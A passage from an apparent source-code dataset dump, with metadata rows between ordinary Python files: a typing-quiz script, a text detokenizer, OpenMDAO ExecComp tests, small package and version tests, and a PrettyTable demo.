                elif score <= 13:
                    print('You scored a D\n')
                elif score <= 15:
                    print('You scored a C\n')
                elif score <= 17:
                    print('You scored a B\n')
                else:
                    print('Nice, you scored an A\n')
                score = 0
                total = 0
                the_Quiz()
# This is the function for the quiz itself
def the_Quiz():
    global score
    global total
    global attempts
    print('Would you like to practice single character, double characters, or sentences?\n')
    the_Decider = input()
    print('\n')
    while the_Decider.lower() == 'single':
        the_ProblemI()
    while the_Decider.lower() == 'double':
        the_ProblemD()
    while the_Decider.lower() == 'sentences':
        the_ProblemS()
# Time to level up ಠ_ಠ
the_Quiz()
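# Note (added): the_Quiz() above runs as soon as this module is executed or
# imported. Wrapping it in an `if __name__ == '__main__':` guard would let the
# word functions be imported elsewhere without immediately starting the quiz.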
| 25.150862 | 121 | 0.520113 | 5,068 | 40,845 | 4.148579 | 0.098264 | 0.064685 | 0.105113 | 0.088942 | 0.748014 | 0.747111 | 0.745398 | 0.743686 | 0.743686 | 0.743686 | 0 | 0.023653 | 0.337544 | 40,845 | 1,623 | 122 | 25.166359 | 0.753382 | 0.010821 | 0 | 0.758344 | 0 | 0.000668 | 0.203684 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.059413 | false | 0 | 0.001335 | 0 | 0.11749 | 0.303071 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
070860cfd22d6473bebd783576b2cdeeeded3e26 | 2,448 | py | Python | prepro/nltk_detok.py | snukky/gec-scripts | dc3a7d5701aca15c9e743fb7965f1223afcec25f | [
"MIT"
] | 5 | 2018-09-12T13:27:10.000Z | 2021-05-18T11:08:52.000Z | prepro/nltk_detok.py | snukky/gec-scripts | dc3a7d5701aca15c9e743fb7965f1223afcec25f | [
"MIT"
] | null | null | null | prepro/nltk_detok.py | snukky/gec-scripts | dc3a7d5701aca15c9e743fb7965f1223afcec25f | [
"MIT"
] | 1 | 2021-09-10T14:20:45.000Z | 2021-09-10T14:20:45.000Z | #!/usr/bin/python
import sys, re
def detokenize_nltk(text):
text = re.sub(r'-LRB-', '(', text)
text = re.sub(r'-RRB-', ')', text)
#text = re.sub(r'\([^\)]+\s[^\)]+\)', ' ', text) # drop parenthesed content
text = re.sub(r' +', ' ', text)
text = re.sub(r'^ ', '', text)
text = re.sub(r' $', '', text)
text = re.sub(r' ?,( ?,)+ ?', ' ', text)
#text = re.sub(r'^([^a-zA-Z\d]*)[,;.?!] *', r'\1', text)
#text = re.sub(r"`` *''", ' ', text)
#text = re.sub(r" ''", '"', text)
#text = re.sub(r'`` ', '"', text)
#text = re.sub(r' \'\'', '"', text)
text = re.sub(r' n\'t', 'n\'t', text)
text = re.sub(r' \'t', '\'t', text)
text = re.sub(r'\$ ([0-9])', r'$\1', text)
text = re.sub(r" '([sdm]|ll|re|ve)\b", r"'\1", text)
text = re.sub(r'(\d) , (\d\d\d([^\d]|$))', r'\1,\2', text)
text = re.sub(r' ([;:,.?!\)\]\}]["\'\)\]\}]?) ', r'\1 ', text)
##text = re.sub(r'([\)\]\}]+) ([;:,.?!]+) ', r'\1\2 ', text)
text = re.sub(r's \' ', r"s' ", text)
# text = re.sub(r'( |^)(["\'\(\[\{]) ([a-zA-Z\d])', r' \2\3', text) # " a => "a
text = re.sub(r'( |^)(["\(\[\{]) ([a-zA-Z\d])', r'\2\3', text) # " a => "a
text = re.sub(r' ([^a-zA-Z\d]+)$', r'\1', text) # " ." => "."
#text = re.sub(r'"[^a-zA-Z\d]*"', '', text)
#text = re.sub(r'\([^a-zA-Z\d]*\)', '', text) # (,)
#text = re.sub(r'\[[^a-zA-Z\d]*\]', '', text)
#text = re.sub(r'\{[^a-zA-Z\d]*\}', '', text)
#text = re.sub(r'\'[^a-zA-Z\d]*\'', '', text)
text = re.sub(' +', ' ', text)
text = re.sub('^ +', '', text)
text = re.sub(' +$', '', text)
text = re.sub(' +\.\.\.', '...', text)
text = re.sub('! !( !)+', '!!!', text)
text = re.sub(r'\s*[,;]+\s*([.!?]["\'\)\]\}]?|["\'\)\]\}][.!?])$', r'\1', text) # ,. => .
text = re.sub(r'\'([a-zA-Z\d-]+) \' ', r"'\1' ", text)
while re.search(r'\b[A-Z]\. [A-Z]\.', text):
text = re.sub(r'\b([A-Z]\.) ([A-Z]\.)', r'\1\2', text) # A. B. C.
text = re.sub(r'([A-Z]) & ([A-Z])', r'\1&\2', text) # AT & T
#text = re.sub(r'([A-Za-z0-9])', (lambda x: x.group(1).capitalize()), text, 1) # ^a => A
#text = re.sub(r'([a-zA-Z0-9])(["\)\]\}])$', r'\1.\2', text) # a" => a."
#text = re.sub(r'([a-zA-Z0-9])$', r'\1.', text) # a$ => a.
#text = re.sub(r'^([^"]*)"([^"]*)$', r'\1\2', text) # lonely quotes
return text
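# Added usage note: the __main__ block below reads tokenized text from stdin,
# so a typical invocation would look like (file names are illustrative only):
#   python nltk_detok.py < tokenized.txt > detokenized.txt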
if __name__ == "__main__":
for line in sys.stdin:
print detokenize_nltk(line.strip())
| 45.333333 | 93 | 0.38317 | 389 | 2,448 | 2.385604 | 0.138817 | 0.265086 | 0.397629 | 0.387931 | 0.762931 | 0.705819 | 0.645474 | 0.59806 | 0.491379 | 0.487069 | 0 | 0.017635 | 0.212418 | 2,448 | 53 | 94 | 46.188679 | 0.463693 | 0.39134 | 0 | 0 | 0 | 0.064516 | 0.228924 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.032258 | null | null | 0.032258 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
071e8fe30410dd9caef12e723f7f683e194345b7 | 11,535 | py | Python | openmdao/components/test/test_exec_comp.py | naylor-b/OpenMDAO1 | 49d82f6601b33db9bdcf7d146d030d55e3b62ef4 | [
"Apache-2.0"
] | 17 | 2018-01-11T20:13:59.000Z | 2022-03-22T03:46:05.000Z | openmdao/components/test/test_exec_comp.py | naylor-b/OpenMDAO1 | 49d82f6601b33db9bdcf7d146d030d55e3b62ef4 | [
"Apache-2.0"
] | 6 | 2017-10-19T23:14:14.000Z | 2020-11-22T17:30:57.000Z | openmdao/components/test/test_exec_comp.py | naylor-b/OpenMDAO1 | 49d82f6601b33db9bdcf7d146d030d55e3b62ef4 | [
"Apache-2.0"
] | 10 | 2018-04-12T22:13:33.000Z | 2020-05-07T10:02:59.000Z | import unittest
import math
import numpy as np
from openmdao.api import IndepVarComp, Group, Problem, ExecComp
from openmdao.test.util import assert_rel_error
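# Note (added): ExecComp builds an OpenMDAO component from a string expression;
# keyword arguments such as x=2.0 or x=np.zeros(2) seed the initial value (and
# hence shape/type) of the corresponding params and unknowns, as the tests
# below exercise.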
class TestExecComp(unittest.TestCase):
def test_bad_kwargs(self):
prob = Problem(root=Group())
try:
C1 = prob.root.add('C1', ExecComp('y=x+1.', xx=2.0))
except Exception as err:
self.assertEqual(str(err), "Arg 'xx' in call to ExecComp() does not refer to any variable in the expressions ['y=x+1.']")
def test_mixed_type(self):
prob = Problem(root=Group())
C1 = prob.root.add('C1', ExecComp('y=numpy.sum(x)',
x=np.arange(10,dtype=float)))
self.assertTrue('x' in C1._init_params_dict)
self.assertTrue('y' in C1._init_unknowns_dict)
prob.setup(check=False)
prob.run()
assert_rel_error(self, C1.unknowns['y'], 45.0, 0.00001)
def test_simple(self):
prob = Problem(root=Group())
C1 = prob.root.add('C1', ExecComp('y=x+1.', x=2.0))
self.assertTrue('x' in C1._init_params_dict)
self.assertTrue('y' in C1._init_unknowns_dict)
prob.setup(check=False)
prob.run()
assert_rel_error(self, C1.unknowns['y'], 3.0, 0.00001)
def test_for_spaces(self):
prob = Problem(root=Group())
C1 = prob.root.add('C1', ExecComp('y = pi * x', x=2.0))
self.assertTrue('x' in C1._init_params_dict)
self.assertTrue('y' in C1._init_unknowns_dict)
self.assertTrue('pi' not in C1._init_params_dict)
prob.setup(check=False)
prob.run()
assert_rel_error(self, C1.unknowns['y'], 2 * math.pi, 0.00001)
def test_units(self):
prob = Problem(root=Group())
C1 = prob.root.add('C1', ExecComp('y=x+z+1.', x=2.0, z=2.0, units={'x':'m','y':'m'}))
self.assertTrue('units' in C1._init_params_dict['x'])
self.assertTrue(C1._init_params_dict['x']['units'] == 'm')
self.assertTrue('units' in C1._init_unknowns_dict['y'])
self.assertTrue(C1._init_unknowns_dict['y']['units'] == 'm')
self.assertFalse('units' in C1._init_params_dict['z'])
prob.setup(check=False)
prob.run()
assert_rel_error(self, C1.unknowns['y'], 5.0, 0.00001)
def test_math(self):
prob = Problem(root=Group())
C1 = prob.root.add('C1', ExecComp('y=sin(x)', x=2.0))
self.assertTrue('x' in C1._init_params_dict)
self.assertTrue('y' in C1._init_unknowns_dict)
prob.setup(check=False)
prob.run()
assert_rel_error(self, C1.unknowns['y'], math.sin(2.0), 0.00001)
def test_array(self):
prob = Problem(root=Group())
C1 = prob.root.add('C1', ExecComp('y=x[1]', x=np.array([1.,2.,3.]), y=0.0))
self.assertTrue('x' in C1._init_params_dict)
self.assertTrue('y' in C1._init_unknowns_dict)
prob.setup(check=False)
prob.run()
assert_rel_error(self, C1.unknowns['y'], 2.0, 0.00001)
def test_array_lhs(self):
prob = Problem(root=Group())
C1 = prob.root.add('C1', ExecComp(['y[0]=x[1]', 'y[1]=x[0]'],
x=np.array([1.,2.,3.]), y=np.array([0.,0.])))
self.assertTrue('x' in C1._init_params_dict)
self.assertTrue('y' in C1._init_unknowns_dict)
prob.setup(check=False)
prob.run()
assert_rel_error(self, C1.unknowns['y'], np.array([2.,1.]), 0.00001)
def test_simple_array_model(self):
prob = Problem()
prob.root = Group()
prob.root.add('comp', ExecComp(['y[0]=2.0*x[0]+7.0*x[1]',
'y[1]=5.0*x[0]-3.0*x[1]'],
x=np.zeros([2]), y=np.zeros([2])))
prob.root.add('p1', IndepVarComp('x', np.ones([2])))
prob.root.connect('p1.x', 'comp.x')
prob.setup(check=False)
prob.run()
data = prob.check_partial_derivatives(out_stream=None)
assert_rel_error(self, data['comp'][('y','x')]['abs error'][0], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('y','x')]['abs error'][1], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('y','x')]['abs error'][2], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('y','x')]['rel error'][0], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('y','x')]['rel error'][1], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('y','x')]['rel error'][2], 0.0, 1e-5)
def test_simple_array_model2(self):
prob = Problem()
prob.root = Group()
comp = prob.root.add('comp', ExecComp('y = mat.dot(x)',
x=np.zeros((2,)), y=np.zeros((2,)),
mat=np.array([[2.,7.],[5.,-3.]])))
p1 = prob.root.add('p1', IndepVarComp('x', np.ones([2])))
prob.root.connect('p1.x', 'comp.x')
prob.setup(check=False)
prob.run()
data = prob.check_partial_derivatives(out_stream=None)
assert_rel_error(self, data['comp'][('y','x')]['abs error'][0], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('y','x')]['abs error'][1], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('y','x')]['abs error'][2], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('y','x')]['rel error'][0], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('y','x')]['rel error'][1], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('y','x')]['rel error'][2], 0.0, 1e-5)
def test_complex_step(self):
prob = Problem(root=Group())
C1 = prob.root.add('C1', ExecComp(['y=2.0*x+1.'], x=2.0))
self.assertTrue('x' in C1._init_params_dict)
self.assertTrue('y' in C1._init_unknowns_dict)
prob.setup(check=False)
prob.run()
assert_rel_error(self, C1.unknowns['y'], 5.0, 0.00001)
J = C1.linearize(C1.params, C1.unknowns, C1.resids)
assert_rel_error(self, J[('y','x')], 2.0, 0.00001)
def test_complex_step2(self):
prob = Problem(Group())
comp = prob.root.add('comp', ExecComp('y=x*x + x*2.0'))
prob.root.add('p1', IndepVarComp('x', 2.0))
prob.root.connect('p1.x', 'comp.x')
comp.deriv_options['type'] = 'user'
prob.setup(check=False)
prob.run()
J = prob.calc_gradient(['p1.x'], ['comp.y'], mode='fwd', return_format='dict')
assert_rel_error(self, J['comp.y']['p1.x'], np.array([6.0]), 0.00001)
J = prob.calc_gradient(['p1.x'], ['comp.y'], mode='rev', return_format='dict')
assert_rel_error(self, J['comp.y']['p1.x'], np.array([6.0]), 0.00001)
def test_abs_complex_step(self):
prob = Problem(root=Group())
C1 = prob.root.add('C1', ExecComp('y=2.0*abs(x)', x=-2.0))
prob.setup(check=False)
prob.run()
assert_rel_error(self, C1.unknowns['y'], 4.0, 0.00001)
# any negative C1.x should give a -2.0 derivative for dy/dx
prob['C1.x'] = -1.0e-10
J = C1.linearize(C1.params, C1.unknowns, C1.resids)
assert_rel_error(self, J[('y','x')], -2.0, 0.00001)
prob['C1.x'] = 3.0
J = C1.linearize(C1.params, C1.unknowns, C1.resids)
assert_rel_error(self, J[('y','x')], 2.0, 0.00001)
prob['C1.x'] = 0.0
J = C1.linearize(C1.params, C1.unknowns, C1.resids)
assert_rel_error(self, J[('y','x')], 2.0, 0.00001)
def test_abs_array_complex_step(self):
prob = Problem(root=Group())
C1 = prob.root.add('C1', ExecComp('y=2.0*abs(x)',
x=np.ones(3)*-2.0, y=np.zeros(3)))
prob.setup(check=False)
prob.run()
assert_rel_error(self, C1.unknowns['y'], np.ones(3)*4.0, 0.00001)
# any negative C1.x should give a -2.0 derivative for dy/dx
prob['C1.x'] = np.ones(3)*-1.0e-10
J = C1.linearize(C1.params, C1.unknowns, C1.resids)
assert_rel_error(self, J[('y','x')], np.eye(3)*-2.0, 0.00001)
prob['C1.x'] = np.ones(3)*3.0
J = C1.linearize(C1.params, C1.unknowns, C1.resids)
assert_rel_error(self, J[('y','x')], np.eye(3)*2.0, 0.00001)
prob['C1.x'] = np.zeros(3)
J = C1.linearize(C1.params, C1.unknowns, C1.resids)
assert_rel_error(self, J[('y','x')], np.eye(3)*2.0, 0.00001)
prob['C1.x'] = np.array([1.5, -0.6, 2.4])
J = C1.linearize(C1.params, C1.unknowns, C1.resids)
expect = np.zeros((3,3))
expect[0,0] = 2.0
expect[1,1] = -2.0
expect[2,2] = 2.0
assert_rel_error(self, J[('y','x')], expect, 0.00001)
def test_colon_names(self):
prob = Problem(root=Group())
C1 = prob.root.add('C1', ExecComp('a:y=a:x+1.+b', inits={'a:x':2.0}, b=0.5))
self.assertTrue('a:x' in C1._init_params_dict)
self.assertTrue('a:y' in C1._init_unknowns_dict)
prob.setup(check=False)
prob.run()
assert_rel_error(self, C1.unknowns['a:y'], 3.5, 0.00001)
def test_complex_step_colons(self):
prob = Problem(root=Group())
C1 = prob.root.add('C1', ExecComp(['foo:y=2.0*foo:bar:x+1.'], inits={'foo:bar:x':2.0}))
self.assertTrue('foo:bar:x' in C1._init_params_dict)
self.assertTrue('foo:y' in C1._init_unknowns_dict)
prob.setup(check=False)
prob.run()
assert_rel_error(self, C1.unknowns['foo:y'], 5.0, 0.00001)
J = C1.linearize(C1.params, C1.unknowns, C1.resids)
assert_rel_error(self, J[('foo:y','foo:bar:x')], 2.0, 0.00001)
def test_complex_step2_colons(self):
prob = Problem(Group())
comp = prob.root.add('comp', ExecComp('foo:y=foo:x*foo:x + foo:x*2.0'))
prob.root.add('p1', IndepVarComp('x', 2.0))
prob.root.connect('p1.x', 'comp.foo:x')
comp.deriv_options['type'] = 'user'
prob.setup(check=False)
prob.run()
J = prob.calc_gradient(['p1.x'], ['comp.foo:y'], mode='fwd', return_format='dict')
assert_rel_error(self, J['comp.foo:y']['p1.x'], np.array([6.0]), 0.00001)
J = prob.calc_gradient(['p1.x'], ['comp.foo:y'], mode='rev', return_format='dict')
assert_rel_error(self, J['comp.foo:y']['p1.x'], np.array([6.0]), 0.00001)
def test_simple_array_model2_colons(self):
prob = Problem()
prob.root = Group()
comp = prob.root.add('comp', ExecComp('foo:y = foo:mat.dot(x)',
inits={'foo:y':np.zeros((2,)),
'foo:mat':np.array([[2.,7.],[5.,-3.]])},
x=np.zeros((2,))))
p1 = prob.root.add('p1', IndepVarComp('x', np.ones([2])))
prob.root.connect('p1.x', 'comp.x')
prob.setup(check=False)
prob.run()
data = prob.check_partial_derivatives(out_stream=None)
assert_rel_error(self, data['comp'][('foo:y','x')]['abs error'][0], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('foo:y','x')]['abs error'][1], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('foo:y','x')]['abs error'][2], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('foo:y','x')]['rel error'][0], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('foo:y','x')]['rel error'][1], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('foo:y','x')]['rel error'][2], 0.0, 1e-5)
if __name__ == "__main__":
unittest.main()
| 37.696078 | 133 | 0.549718 | 1,802 | 11,535 | 3.392342 | 0.077137 | 0.06936 | 0.100769 | 0.126615 | 0.867168 | 0.835433 | 0.809586 | 0.782267 | 0.765254 | 0.74726 | 0 | 0.064298 | 0.243606 | 11,535 | 305 | 134 | 37.819672 | 0.636332 | 0.00997 | 0 | 0.522936 | 0 | 0.004587 | 0.095121 | 0.005781 | 0 | 0 | 0 | 0 | 0.316514 | 1 | 0.082569 | false | 0 | 0.022936 | 0 | 0.110092 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
072b528fe55db058c78dafce62ff4a8b76ddf6cf | 630 | py | Python | parcels/interaction/neighborsearch/__init__.py | noemieplanat/Copy-parcels-master | 21f053b81a9ccdaa5d8ee4f7efd6f01639b83bfc | [
"MIT"
] | 202 | 2017-07-24T23:22:38.000Z | 2022-03-22T15:33:46.000Z | parcels/interaction/neighborsearch/__init__.py | noemieplanat/Copy-parcels-master | 21f053b81a9ccdaa5d8ee4f7efd6f01639b83bfc | [
"MIT"
] | 538 | 2017-06-21T08:04:43.000Z | 2022-03-31T14:36:45.000Z | parcels/interaction/neighborsearch/__init__.py | noemieplanat/Copy-parcels-master | 21f053b81a9ccdaa5d8ee4f7efd6f01639b83bfc | [
"MIT"
] | 94 | 2017-07-05T10:28:55.000Z | 2022-03-23T19:46:23.000Z | from parcels.interaction.neighborsearch.hashflat import HashFlatNeighborSearch
from parcels.interaction.neighborsearch.hashspherical import HashSphericalNeighborSearch # noqa
from parcels.interaction.neighborsearch.bruteforce import BruteFlatNeighborSearch # noqa
from parcels.interaction.neighborsearch.bruteforce import BruteSphericalNeighborSearch # noqa
from parcels.interaction.neighborsearch.kdtreeflat import KDTreeFlatNeighborSearch # noqa
__all__ = ["HashFlatNeighborSearch", "HashSphericalNeighborSearch",
"BruteFlatNeighborSearch",
"BruteSphericalNeighborSearch", "KDTreeFlatNeighborSearch"]
| 63 | 96 | 0.844444 | 45 | 630 | 11.733333 | 0.355556 | 0.104167 | 0.208333 | 0.340909 | 0.287879 | 0.212121 | 0.212121 | 0 | 0 | 0 | 0 | 0 | 0.098413 | 630 | 9 | 97 | 70 | 0.929577 | 0.030159 | 0 | 0 | 0 | 0 | 0.20462 | 0.20462 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.625 | 0 | 0.625 | 0 | 0 | 0 | 1 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0743c92fe2c85c90712a668acb30f85012c1d914 | 107 | py | Python | tests/test_GitSync.py | ClockworkNet/GitSync | fa8494b6078096d5982beef47ee11549923b576b | [
"MIT"
] | 1 | 2015-04-22T15:03:06.000Z | 2015-04-22T15:03:06.000Z | tests/test_GitSync.py | ClockworkNet/GitSync | fa8494b6078096d5982beef47ee11549923b576b | [
"MIT"
] | null | null | null | tests/test_GitSync.py | ClockworkNet/GitSync | fa8494b6078096d5982beef47ee11549923b576b | [
"MIT"
] | null | null | null | from gitsync import GitSync
def test_main():
    assert GitSync.kFSEventStreamEventFlagNone == 0x00000000
| 21.4 | 60 | 0.803738 | 11 | 107 | 7.727273 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097826 | 0.140187 | 107 | 4 | 61 | 26.75 | 0.826087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093458 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
07565be8f95d8891ab3852d533efdbd07fe02012 | 994 | py | Python | tests/support.py | gsakkis/typecheck | bc49d8651eff5944179967af55156219a0228b03 | [
"MIT"
] | null | null | null | tests/support.py | gsakkis/typecheck | bc49d8651eff5944179967af55156219a0228b03 | [
"MIT"
] | null | null | null | tests/support.py | gsakkis/typecheck | bc49d8651eff5944179967af55156219a0228b03 | [
"MIT"
] | null | null | null | import unittest
class TestCase(unittest.TestCase):
def multipleAssertEqual(self, eq_tests, ne_tests, repeats=10):
# We run this multiple times to try and shake out any errors
# related to differences in set/dict/etc ordering
for _ in xrange(0, repeats):
for left, right in eq_tests:
self.assertTrue(left == right)
self.assertFalse(left != right)
for left, right in ne_tests:
self.assertTrue(left != right)
self.assertFalse(left == right)
def multipleAssertEqualHashes(self, eq_tests, ne_tests, repeats=10):
# We run this multiple times to try and shake out any errors
# related to differences in set/dict/etc ordering
for _ in xrange(0, repeats):
for left, right in eq_tests:
self.assertTrue(hash(left) == hash(right))
for left, right in ne_tests:
self.assertTrue(hash(left) != hash(right))
| 41.416667 | 72 | 0.612676 | 126 | 994 | 4.753968 | 0.31746 | 0.1202 | 0.080134 | 0.093489 | 0.844741 | 0.844741 | 0.844741 | 0.796327 | 0.796327 | 0.560935 | 0 | 0.008708 | 0.306841 | 994 | 23 | 73 | 43.217391 | 0.860668 | 0.214286 | 0 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.125 | false | 0 | 0.0625 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ab19d7c20fe980eb2413410f19c809bc83a9d1c7 | 142 | py | Python | mmdet3d/ops/paconv/__init__.py | Guangyun-Xu/mmdetection3d | 75c5c6cd590386bd1539a686c5fd2cc45c5480d5 | [
"Apache-2.0"
] | 2,216 | 2020-07-09T19:10:11.000Z | 2022-03-31T12:39:26.000Z | mmdet3d/ops/paconv/__init__.py | Guangyun-Xu/mmdetection3d | 75c5c6cd590386bd1539a686c5fd2cc45c5480d5 | [
"Apache-2.0"
] | 1,174 | 2020-07-10T07:02:28.000Z | 2022-03-31T12:38:56.000Z | mmdet3d/ops/paconv/__init__.py | Guangyun-Xu/mmdetection3d | 75c5c6cd590386bd1539a686c5fd2cc45c5480d5 | [
"Apache-2.0"
] | 681 | 2020-07-09T19:40:06.000Z | 2022-03-31T11:02:24.000Z | from .assign_score import assign_score_withk
from .paconv import PAConv, PAConvCUDA
__all__ = ['assign_score_withk', 'PAConv', 'PAConvCUDA']
| 28.4 | 56 | 0.795775 | 18 | 142 | 5.777778 | 0.444444 | 0.317308 | 0.307692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105634 | 142 | 4 | 57 | 35.5 | 0.818898 | 0 | 0 | 0 | 0 | 0 | 0.239437 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ab2ae7ad342a4caf68f7a89108b5c92dadafb27a | 30 | py | Python | src/core/app/app/views/__init__.py | WeAreBeep/FrontLineLive | faffe0672996eea3d6ada18e4a7fccb4419cac2f | [
"MIT"
] | null | null | null | src/core/app/app/views/__init__.py | WeAreBeep/FrontLineLive | faffe0672996eea3d6ada18e4a7fccb4419cac2f | [
"MIT"
] | 15 | 2020-11-07T20:21:30.000Z | 2021-03-31T09:51:51.000Z | src/core/app/app/views/__init__.py | WeAreBeep/FrontLineLive | faffe0672996eea3d6ada18e4a7fccb4419cac2f | [
"MIT"
] | 11 | 2020-11-07T18:46:12.000Z | 2022-03-13T15:50:30.000Z | from .map import get_map_data
| 15 | 29 | 0.833333 | 6 | 30 | 3.833333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 30 | 1 | 30 | 30 | 0.884615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ab4719f31350884bbe00738f70af0f4cd959e392 | 95 | py | Python | tests/test_dbd.py | AlexRogalskiy/dbd | ac2c6fb673861321b23fbf2a57d9e39fa5cb5352 | [
"BSD-3-Clause"
] | 33 | 2022-01-09T09:32:17.000Z | 2022-03-05T18:52:11.000Z | tests/test_dbd.py | zsvoboda/dbd | ac2c6fb673861321b23fbf2a57d9e39fa5cb5352 | [
"BSD-3-Clause"
] | 2 | 2022-02-16T19:14:13.000Z | 2022-02-16T19:14:34.000Z | tests/test_dbd.py | zsvoboda/dbd | ac2c6fb673861321b23fbf2a57d9e39fa5cb5352 | [
"BSD-3-Clause"
] | null | null | null | import importlib
def test_version():
    assert importlib.metadata.version('dbd') == '0.8.9'
| 15.833333 | 55 | 0.694737 | 13 | 95 | 5 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037037 | 0.147368 | 95 | 5 | 56 | 19 | 0.765432 | 0 | 0 | 0 | 0 | 0 | 0.084211 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.666667 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ab56e221fdb3eeeefe9347649fa87fc354646d99 | 19,419 | py | Python | src/datashow/prettytable/url_query_display.py | snowdreams1006/learn-python | d224bedbb670b6462e1e9a013c0a0316be10207c | [
"MIT"
] | 1 | 2019-12-25T04:20:19.000Z | 2019-12-25T04:20:19.000Z | src/datashow/prettytable/url_query_display.py | snowdreams1006/learn-python | d224bedbb670b6462e1e9a013c0a0316be10207c | [
"MIT"
] | 13 | 2020-01-16T03:23:50.000Z | 2020-11-25T11:55:29.000Z | src/datashow/prettytable/url_query_display.py | snowdreams1006/learn-python | d224bedbb670b6462e1e9a013c0a0316be10207c | [
"MIT"
] | 1 | 2020-03-28T11:46:03.000Z | 2020-03-28T11:46:03.000Z | # -*- coding: utf-8 -*-
from urllib.parse import urlparse, parse_qs, parse_qsl
from prettytable import PrettyTable
import numpy as np
def simple_table_demo():
'''
Minimal PrettyTable demo: build a small table and print it.
'''
table = PrettyTable()
table.field_names = ["City name", "Area", "Population", "Annual Rainfall"]
table.add_row(["Adelaide",1295, 1158259, 600.5])
table.add_row(["Brisbane",5905, 1857594, 1146.4])
table.add_row(["Darwin", 112, 120900, 1714.7])
table.add_row(["Hobart", 1357, 205556,619.5])
print('>>>simple_table_demo<<<')
print(table)
def sorted_table_demo():
'''
Show the table sorted by a chosen column.
'''
table = PrettyTable()
table.field_names = ["City name", "Area", "Population", "Annual Rainfall"]
table.add_row(["Adelaide",1295, 1158259, 600.5])
table.add_row(["Brisbane",5905, 1857594, 1146.4])
table.add_row(["Darwin", 112, 120900, 1714.7])
table.add_row(["Hobart", 1357, 205556,619.5])
